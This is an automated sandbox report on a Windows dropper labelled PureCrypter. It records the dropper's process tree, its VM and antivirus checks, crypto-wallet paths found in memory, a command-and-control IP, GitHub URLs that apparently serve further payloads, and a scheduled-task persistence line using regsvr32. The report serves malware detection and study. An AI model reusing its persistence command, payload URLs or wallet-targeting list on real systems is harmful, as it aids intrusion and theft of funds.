      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe | Code function: 9_2_00007FFD3493EFF0 GetCurrentProcessId,ProcessPrng,CreateNamedPipeW,GetLastError,CloseHandle,CloseHandle,ReadFileEx,SleepEx,GetLastError, | 9_2_00007FFD3493EFF0
Source: C:\Windows\System32\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: regsvr32.exe, 0000000E.00000002.2142655028.000000001C0DD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\regsvr32.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000038B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Electrum
Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000038B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: com.liberty.jaxx
Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000038B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000038B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 1C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000038B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Exodus
Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000038B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Ethereum
Source: powershell.exe, 0000000A.00000002.976333439.00007FFCF4650000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Source: C:\Windows\System32\regsvr32.exe | Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Source: Yara match | File source: 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 8808, type: MEMORYSTR
Mitre Att&ck Matrix

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 321 Windows Management Instrumentation | 1 Scheduled Task/Job | 213 Process Injection | 11 Masquerading | OS Credential Dumping | 661 Security Software Discovery | Remote Services | 11 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Scheduled Task/Job | 1 Disable or Modify Tools | LSASS Memory | 351 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Data from Local System | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | Logon Script (Windows) | 1 DLL Side-Loading | 351 Virtualization/Sandbox Evasion | Security Account Manager | 3 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 1 Native API | Login Hook | Login Hook | 213 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | 1 PowerShell | Network Logon Script | Network Logon Script | 11 Deobfuscate/Decode Files or Information | LSA Secrets | 2 System Owner/User Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | 233 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
Behavior Graph ID: 1583336 | Sample: 8n26gvrXUM.exe | Start date: 02/01/2025 | Architecture: WINDOWS | Score: 100

Start
  signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 3 other signatures
  8n26gvrXUM.exe started
    dropped: C:\Users\user\AppData\...\8n26gvrXUM.tmp, PE32
    8n26gvrXUM.tmp started
      dropped: C:\Users\user\AppData\Local\...\_shfoldr.dll, PE32; C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+; C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32
      cmd.exe started
        8n26gvrXUM.exe started
          dropped: C:\Users\user\AppData\...\8n26gvrXUM.tmp, PE32
          8n26gvrXUM.tmp started
            dropped: C:\Users\user\...\netapi32_1.drv (copy), PE32+; C:\Users\user\AppData\Roaming\is-J08NI.tmp, PE32+; C:\Users\user\AppData\...\unins000.exe (copy), PE32; 4 other files (none is malicious)
            regsvr32.exe started
              regsvr32.exe started
                signatures: Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines); Suspicious powershell command line found; Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); 4 other signatures
                powershell.exe started
                  signatures: Found many strings related to Crypto-Wallets (likely being stolen); Loading BitLocker PowerShell Module
                  conhost.exe started
                powershell.exe started
                  conhost.exe started
        conhost.exe started
        timeout.exe started
  regsvr32.exe started
    network: 144.202.34.112, ports 49715, 56001, AS-CHOOPAUS, United States
    signatures: System process connects to network (likely due to code injection or exploit); Suspicious powershell command line found; Found many strings related to Crypto-Wallets (likely being stolen); 2 other signatures
    powershell.exe started
      signatures: Loading BitLocker PowerShell Module
      conhost.exe started
  svchost.exe started
    network: 127.0.0.1 unknown unknown

Source | Detection | Scanner | Label | Link
8n26gvrXUM.exe | 50% | ReversingLabs | Win32.Ransomware.PureCrypter |
8n26gvrXUM.exe | 56% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_isdecmp.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_shfoldr.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp | 3% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-M0V11.tmp\_isetup\_isdecmp.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-M0V11.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-M0V11.tmp\_isetup\_shfoldr.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp | 3% | ReversingLabs | |
C:\Users\user\AppData\Local\is-JVPOA.tmp | 3% | ReversingLabs | |
C:\Users\user\AppData\Local\unins000.exe (copy) | 3% | ReversingLabs | |
C:\Users\user\AppData\Roaming\is-J08NI.tmp | 43% | ReversingLabs | Win64.Packed.Generic |
C:\Users\user\AppData\Roaming\netapi32_1.drv (copy) | 43% | ReversingLabs | Win64.Packed.Generic |
      No Antivirus matches
Source | Detection | Scanner | Label | Link
http://crl.ver) | 0% | Avira URL Cloud | safe |
https://.VisualC | 0% | Avira URL Cloud | safe |
http://schemas.microsoft.co | 0% | Avira URL Cloud | safe |
http://crl.microsoft.c | 0% | Avira URL Cloud | safe |
http://www.innosetup.com/ | 0% | Avira URL Cloud | safe |
http://www.remobjects.com/ps | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.innosetup.com/ | 8n26gvrXUM.exe, 00000000.00000003.881850634.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.exe, 00000000.00000003.881404803.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000001.00000000.883261373.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-JVPOA.tmp.7.dr, 8n26gvrXUM.tmp.6.dr, 8n26gvrXUM.tmp.0.dr | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 0000000A.00000002.945864209.000002660148C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.963153072.0000026610078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1095561017.0000029390077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938149C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1110863403.0000020890077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.0000020881496000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/14436606/23354 | regsvr32.exe, 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1145750310.00000293F4118000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll | regsvr32.exe, 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1145750310.00000293F4118000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe | regsvr32.exe, 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 0000000F.00000002.1026201200.0000020881496000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 0000000F.00000002.1026201200.0000020881496000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://docs.rs/getrandom#nodejs-es-module-support | regsvr32.exe, regsvr32.exe, 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp, is-J08NI.tmp.7.dr | false | | high
http://crl.ver) | svchost.exe, 00000011.00000002.2138830717.000001C713847000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1145750310.00000293F4118000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/Prod/C: | qmgr.db.17.dr | false | | high
http://www.apache.org/licenses/LICENSE-2.0.htmlXz | powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/2152978/23354rCannot | regsvr32.exe, 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/11564914/23354; | regsvr32.exe, 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe | regsvr32.exe, 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 0000000F.00000002.1026201200.0000020881496000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 0000000A.00000002.945864209.000002660148C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.963153072.0000026610078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1095561017.0000029390077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938149C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1110863403.0000020890077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.0000020881496000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsoft.c | powershell.exe, 0000000F.00000002.1135113573.00000208F6821000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.quovadis.bm0 | powershell.exe, 0000000A.00000002.968534001.0000026677F96000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1139170748.00000293F3A50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1588032598.000000001BB8E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2141694370.000000001BB8F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1131585737.00000208F6490000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2139398628.000001C713899000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2139657410.000001C713902000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://github.com/Pester/PesterXz | powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://.VisualC | powershell.exe, 0000000C.00000002.1145750310.00000293F4143000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 0000000A.00000002.945864209.0000026600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.0000029380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.0000020880001000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.remobjects.com/ps | 8n26gvrXUM.exe, 00000000.00000003.881850634.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.exe, 00000000.00000003.881404803.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000001.00000000.883261373.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-JVPOA.tmp.7.dr, 8n26gvrXUM.tmp.6.dr, 8n26gvrXUM.tmp.0.dr | false | Avira URL Cloud: safe | unknown
https://ocsp.quovadisoffshore.com0 | powershell.exe, 0000000A.00000002.968534001.0000026677F96000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1139170748.00000293F3A50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1588032598.000000001BB8E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2141694370.000000001BB8F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1131585737.00000208F6490000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2139398628.000001C713899000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2139657410.000001C713902000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000A.00000002.945864209.0000026600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.0000029380001000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2137187188.000000000373B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.0000020880001000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.microsoft.co | powershell.exe, 0000000C.00000002.1145750310.00000293F4143000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.pngXz | powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
144.202.34.112 | unknown | United States | | 20473 | AS-CHOOPAUS | true

IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1583336
Start date and time: 2025-01-02 14:02:22 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 13m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected VM Detection
Number of new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 8n26gvrXUM.exe
Detection: MAL
Classification: mal100.spyw.evad.winEXE@27/31@0/2
                                                          EGA Information:
                                                          • Successful, ratio: 40%
                                                          HCA Information:
                                                          • Successful, ratio: 67%
                                                          • Number of executed functions: 160
                                                          • Number of non-executed functions: 32
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 199.232.214.172, 23.204.76.112
                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, c.pki.goog, wu-b-net.trafficmanager.net
• Execution Graph export aborted for target 8n26gvrXUM.tmp, PID 8968 because there are no executed functions
                                                          • Execution Graph export aborted for target powershell.exe, PID 7648 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 8472 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
08:08:05 | API Interceptor | 42x Sleep call for process: powershell.exe modified
08:08:32 | API Interceptor | 2x Sleep call for process: svchost.exe modified
08:08:46 | API Interceptor | 1071403x Sleep call for process: regsvr32.exe modified
14:08:12 | Task Scheduler | Run new task: MicrosoftEdgeUpdateTaskMachineUA{5AA590E8-E6D2-49AB-E5B8-6BCEE32CF7C9} path: regsvr32 s>/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv
                                                          No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
bg.microsoft.map.fastly.net | https://gldkzr-lpqw.buzz/script/ut.js?cb%5C=1735764124690 | Get hash | malicious | Unknown | Browse | 199.232.210.172
